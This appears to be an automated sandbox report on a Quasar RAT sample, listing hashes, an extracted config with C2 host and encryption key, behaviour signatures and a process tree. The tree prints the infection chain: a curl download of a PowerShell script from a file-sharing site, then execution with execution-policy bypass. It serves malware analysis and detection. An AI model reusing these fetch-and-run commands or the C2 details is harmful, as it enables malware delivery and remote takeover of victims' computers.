Analysis

  • max time kernel
    133s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/01/2023, 08:11

General

  • Target

    {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe

  • Size

    547KB

  • MD5

    b0ab211e83a23d58e1322e4d2d6f0a96

  • SHA1

    d568fbcd41e30651cc80ba8a5e9eeab637a99f9e

  • SHA256

    3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5

  • SHA512

    4a54251fbf23fe3d0e96fcf8d3363e917921644a178387b619367338faa1884134639dd696d55a5a9f06cf167f128d599cc57fb62dba603afc4ebb287d22204d

  • SSDEEP

    3072:SvGyYiSDnt1G5GWp1icKAArDZz4N9GhbkrNEk184:W4wp0yN90QEg

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

Office04

C2

ghcc.duckdns.org:4782

Mutex

a9c03eb7-f3c1-4b9e-a4f7-1962d17a793b

Attributes
  • encryption_key

    B0326395AC2D48856CAE22978A087DF5DCF5816D

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Update

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
    "C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:2104
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c new.vbs
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4604
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\new.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3340
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4280
          • C:\Windows\system32\cmd.exe
            cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1548
            • C:\Windows\system32\curl.exe
              curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
              6⤵
                PID:796
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4264
            • C:\Windows\system32\cmd.exe
              cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3424
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
                6⤵
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:444
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  7⤵
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:3140

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\new.vbs

      Filesize

      300.0MB

      MD5

      f7e7099eea0cc25fc49d04cd53c573a1

      SHA1

      3abac9f3f93b0f87ef432d70c40e8ab865157770

      SHA256

      b7f331e83a80b15cc4537324bde827ac9b2ecb990150db4d00d84ee2560cf5be

      SHA512

      c19ddc5e41ed6d485f5df47996f34ff326a782e909bffaa8aa31a3f72fddb33cc7e3709e0cc44b2078668dc83297b42bb3157d6d000a9323ffca6303cd43f074

    • C:\Users\Admin\AppData\Roaming\rr.ps1

      Filesize

      5.1MB

      MD5

      970aca768e68faa580f758a1a379686b

      SHA1

      6a93921485cbd83382eb5a47315b1f0a67bcf684

      SHA256

      6c1e62385d660ca43e024d461154fbb4805e429cdf7850d19510d7f69533739e

      SHA512

      66dd4c5b17978e68c8e0cd2bc4fd35ba5d519447ff34259ec77d11e4253cbfc9955a43915ed3c343f41dc04d97f4302ab6922a823b0e0da44e8893d29ec7cf0f

    • memory/444-146-0x00007FF8A6AB0000-0x00007FF8A7571000-memory.dmp

      Filesize

      10.8MB

    • memory/444-143-0x00007FF8A6AB0000-0x00007FF8A7571000-memory.dmp

      Filesize

      10.8MB

    • memory/444-141-0x000002B3F3A30000-0x000002B3F3A52000-memory.dmp

      Filesize

      136KB

    • memory/3140-147-0x0000000005A90000-0x0000000006034000-memory.dmp

      Filesize

      5.6MB

    • memory/3140-153-0x0000000007CE0000-0x0000000007D46000-memory.dmp

      Filesize

      408KB

    • memory/3140-152-0x0000000006300000-0x00000000063B2000-memory.dmp

      Filesize

      712KB

    • memory/3140-144-0x0000000000400000-0x0000000000484000-memory.dmp

      Filesize

      528KB

    • memory/3140-151-0x0000000006090000-0x00000000060E0000-memory.dmp

      Filesize

      320KB

    • memory/3140-150-0x0000000006660000-0x0000000006C78000-memory.dmp

      Filesize

      6.1MB

    • memory/3140-149-0x0000000005450000-0x000000000545A000-memory.dmp

      Filesize

      40KB

    • memory/3140-148-0x00000000054E0000-0x0000000005572000-memory.dmp

      Filesize

      584KB